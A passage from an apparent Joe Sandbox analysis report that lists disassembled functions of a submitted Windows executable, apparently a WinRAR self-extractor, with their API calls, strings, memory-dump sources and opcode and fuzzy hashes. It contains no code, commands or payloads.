                                                                                        • Instruction Fuzzy Hash: 1811B376110249BFCB02FF94C982DDD3BB6EF14350B9154A1FA088F262DE32EE559B84
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00379711 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 126memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 00379736
                                                                                        • _wcslen.LIBCMT ref: 003797D6
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 003797E5
                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00379806
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                                                        • String ID: Fjun7$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                        • API String ID: 1116704506-1321622670
                                                                                        • Opcode ID: 761a863b23e5b40f13b7ed6dbbe4f9588a4457b834245fb5c70cd7eb96743c3e
                                                                                        • Instruction ID: 61e0917fc0647e54ce2e01b2185d925ee6898d4556ce7db39360d78848ec572c
                                                                                        • Opcode Fuzzy Hash: 761a863b23e5b40f13b7ed6dbbe4f9588a4457b834245fb5c70cd7eb96743c3e
                                                                                        • Instruction Fuzzy Hash: DA3125321083117AEB37BB649C46FAB779CDF43720F15421FF5059A1D2EB68DA0583A6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindow.USER32(?,00000005), ref: 0037D6C1
                                                                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 0037D6ED
                                                                                          • Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0037D709
                                                                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0037D720
                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0037D734
                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0037D75D
                                                                                        • DeleteObject.GDI32(00000000), ref: 0037D764
                                                                                        • GetWindow.USER32(00000000,00000002), ref: 0037D76D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                        • String ID: STATIC
                                                                                        • API String ID: 3820355801-1882779555
                                                                                        • Opcode ID: 0d2d8b4652f1c25b25fc693dc3a59d90b1d9e588a27f5b7616b7daad19fe6a79
                                                                                        • Instruction ID: 9b32b17b59045dff4f65d8cb4263aed1c71b8913f68cc86d47ba9e4f5b2297f6
                                                                                        • Opcode Fuzzy Hash: 0d2d8b4652f1c25b25fc693dc3a59d90b1d9e588a27f5b7616b7daad19fe6a79
                                                                                        • Instruction Fuzzy Hash: C41121731007607FE6337B709C4AFAF766CAF44751F01C120FA4AEA091DA689A0556A6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00382E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                        • String ID: csm$csm$csm
                                                                                        • API String ID: 322700389-393685449
                                                                                        • Opcode ID: 7d12f571a49bad8ee25b87953de65253c33eab3c4e4dd38d2b6e183ab11da264
                                                                                        • Instruction ID: 0145e014c49bcc446669f86444e7c1c239d8a1eb58b13eced782fff9d9279981
                                                                                        • Opcode Fuzzy Hash: 7d12f571a49bad8ee25b87953de65253c33eab3c4e4dd38d2b6e183ab11da264
                                                                                        • Instruction Fuzzy Hash: D6B15575800309EFCF2AFFA4C8859AFBBB5BF14B10B15419AE8056B312D735DA51CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00366FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00366FAA
                                                                                        • _wcslen.LIBCMT ref: 00367013
                                                                                        • _wcslen.LIBCMT ref: 00367084
                                                                                          • Part of subcall function 00367A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00367AAB
                                                                                          • Part of subcall function 00367A9C: GetLastError.KERNEL32 ref: 00367AF1
                                                                                          • Part of subcall function 00367A9C: CloseHandle.KERNEL32(?), ref: 00367B00
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                        • API String ID: 3122303884-3508440684
                                                                                        • Opcode ID: f9050661405863ae0e65fe2959d75fe8e208106eda22f764304e49be063362da
                                                                                        • Instruction ID: 6b6bda3a5ad7a7ec329c240031c42dba128a26fa8d24cfeb2e1696c6da344ad9
                                                                                        • Opcode Fuzzy Hash: f9050661405863ae0e65fe2959d75fe8e208106eda22f764304e49be063362da
                                                                                        • Instruction Fuzzy Hash: C1413BB1D087447AEF33E7709C42FEEB36C9F05348F408455FA55AA286D674AA448B31
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                          • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                        • EndDialog.USER32(?,00000001), ref: 0037B610
                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 0037B637
                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0037B650
                                                                                        • SetWindowTextW.USER32(?,?), ref: 0037B661
                                                                                        • GetDlgItem.USER32(?,00000065), ref: 0037B66A
                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0037B67E
                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0037B694
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                        • String ID: LICENSEDLG
                                                                                        • API String ID: 3214253823-2177901306
                                                                                        • Opcode ID: d6a87b002b5c491d968797bb1b3ad19f69425f2dcd1f0bd2d072ce2bd2306a9d
                                                                                        • Instruction ID: 808de1ce296c5d0a778fa1705c40915954bf6d828be70c9ecc176d2c6369fe30
                                                                                        • Opcode Fuzzy Hash: d6a87b002b5c491d968797bb1b3ad19f69425f2dcd1f0bd2d072ce2bd2306a9d
                                                                                        • Instruction Fuzzy Hash: 3021D632204218BFD6236B65EC49F7B7B7CEB4AB85F02C014F709E65A0CB56A9019735
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0037FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,D7A0014E,00000001,00000000,00000000,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FD99
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FE14
                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0037FE1F
                                                                                        • _com_issue_error.COMSUPP ref: 0037FE48
                                                                                        • _com_issue_error.COMSUPP ref: 0037FE52
                                                                                        • GetLastError.KERNEL32(80070057,D7A0014E,00000001,00000000,00000000,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FE57
                                                                                        • _com_issue_error.COMSUPP ref: 0037FE6A
                                                                                        • GetLastError.KERNEL32(00000000,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FE80
                                                                                        • _com_issue_error.COMSUPP ref: 0037FE93
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                        • String ID:
                                                                                        • API String ID: 1353541977-0
                                                                                        • Opcode ID: e229f5b64b68412a70370b4ded5ba5f082dae5b78ed6c20c1d820baeb9c12f84
                                                                                        • Instruction ID: 5a4201071040786365f47383206bfa696e5d0a46e1926bd269423af698b77b93
                                                                                        • Opcode Fuzzy Hash: e229f5b64b68412a70370b4ded5ba5f082dae5b78ed6c20c1d820baeb9c12f84
                                                                                        • Instruction Fuzzy Hash: 6641CCB1A00215EFDB229F64CC45BAFB7A8FF44710F10827AF919E7651D7399900C7A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0036AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                        • API String ID: 3519838083-3505469590
                                                                                        • Opcode ID: 74572c897101a63615dfe1f930d42f306f037ea6874297c1ab322b0463bca02b
                                                                                        • Instruction ID: b801edb2f40fc564b1e0a9c92ee9ad070567d51cea78767f89f65ef547e86f72
                                                                                        • Opcode Fuzzy Hash: 74572c897101a63615dfe1f930d42f306f037ea6874297c1ab322b0463bca02b
                                                                                        • Instruction Fuzzy Hash: 50715B71A00619AFDF16DFA8CC959AFBBB9FF48310B044559E512E72A0CB31AD41CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00369382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00369387
                                                                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 003693AA
                                                                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 003693C9
                                                                                          • Part of subcall function 0036C29A: _wcslen.LIBCMT ref: 0036C2A2
                                                                                          • Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1
                                                                                        • _swprintf.LIBCMT ref: 00369465
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 003694D4
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00369514
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                        • String ID: rtmp%d
                                                                                        • API String ID: 3726343395-3303766350
                                                                                        • Opcode ID: bb83b551878aaaa2d0cb4493f7b829b4be0fac24e1fa8e83c794b72e1b88bffc
                                                                                        • Instruction ID: 00108c9c8ec5415db0e32dbbd43f73687448d6260f0222137f414dc3a19af6da
                                                                                        • Opcode Fuzzy Hash: bb83b551878aaaa2d0cb4493f7b829b4be0fac24e1fa8e83c794b72e1b88bffc
                                                                                        • Instruction Fuzzy Hash: 504177B1900258A5DF23EB61CD55FEE737CAF45740F00C8A6B64AE7155DB388B898B60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00361100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID: U7$p7$z7
                                                                                        • API String ID: 176396367-3179075045
                                                                                        • Opcode ID: 24fc483c363a08b2ff61462a3e27a690a25493edb9e03439e5c448b75650deea
                                                                                        • Instruction ID: 23e00f1cb78c102a2918df415b6aaa91b44ddf80a76c7ed3cba2d1b8ced83ebe
                                                                                        • Opcode Fuzzy Hash: 24fc483c363a08b2ff61462a3e27a690a25493edb9e03439e5c448b75650deea
                                                                                        • Instruction Fuzzy Hash: 4841B6719006699BCB26AF68CC159DFBBBCEF01311F058019F946F7245DB34AE458BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00379ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShowWindow.USER32(?,00000000), ref: 00379EEE
                                                                                        • GetWindowRect.USER32(?,00000000), ref: 00379F44
                                                                                        • ShowWindow.USER32(?,00000005,00000000), ref: 00379FDB
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00379FE3
                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00379FF9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$RectText
                                                                                        • String ID: 7$RarHtmlClassName
                                                                                        • API String ID: 3937224194-370341044
                                                                                        • Opcode ID: f6950df47ae3a90ac9b8bec741642b4d37c59e7ce0761aebafeb6afb7abb8fb8
                                                                                        • Instruction ID: f69b7a7f50432805bf5da223437626acb393e0495c5109055a2302a1ca8d6d8d
                                                                                        • Opcode Fuzzy Hash: f6950df47ae3a90ac9b8bec741642b4d37c59e7ce0761aebafeb6afb7abb8fb8
                                                                                        • Instruction Fuzzy Hash: B841AF32008314EFCB23AF649C48F6B7BACEF48702F05C659F8499A156DB38E904DB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00371218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __aulldiv.LIBCMT ref: 0037122E
                                                                                          • Part of subcall function 0036B146: GetVersionExW.KERNEL32(?), ref: 0036B16B
                                                                                        • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00371251
                                                                                        • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00371263
                                                                                        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00371274
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00371284
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00371294
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 003712CF
                                                                                        • __aullrem.LIBCMT ref: 00371379
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                        • String ID:
                                                                                        • API String ID: 1247370737-0
                                                                                        • Opcode ID: 43e78a912b511cc4ebf3097787fb09253fb26a9a28d6c74b0e54ccffe16df1d6
                                                                                        • Instruction ID: a324559b808e068a019df5012837949852d5623d57ca928de80683eda7dd0bc3
                                                                                        • Opcode Fuzzy Hash: 43e78a912b511cc4ebf3097787fb09253fb26a9a28d6c74b0e54ccffe16df1d6
                                                                                        • Instruction Fuzzy Hash: 9B4118B6508305AFD711DF69C88496BBBF9FF88314F00892EF59AC6210E739E649CB51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00362210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _swprintf.LIBCMT ref: 00362536
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                          • Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                        • String ID: ;%u$x%u$xc%u
                                                                                        • API String ID: 3053425827-2277559157
                                                                                        • Opcode ID: 8b390e0dadf2525ceb3b1d6cde3a00ce2ee7cadccf792d96981109fa595e9f24
                                                                                        • Instruction ID: 49d3e63ba858cedbed4ae221c08d13dc5ac126d87125323100fd59693346f4ba
                                                                                        • Opcode Fuzzy Hash: 8b390e0dadf2525ceb3b1d6cde3a00ce2ee7cadccf792d96981109fa595e9f24
                                                                                        • Instruction Fuzzy Hash: 19F125716047409BCB27DB288895BFB77995F90300F0AC569EDCA9F28BCB648945C762
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00379CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID: </p>$</style>$<br>$<style>$>
                                                                                        • API String ID: 176396367-3568243669
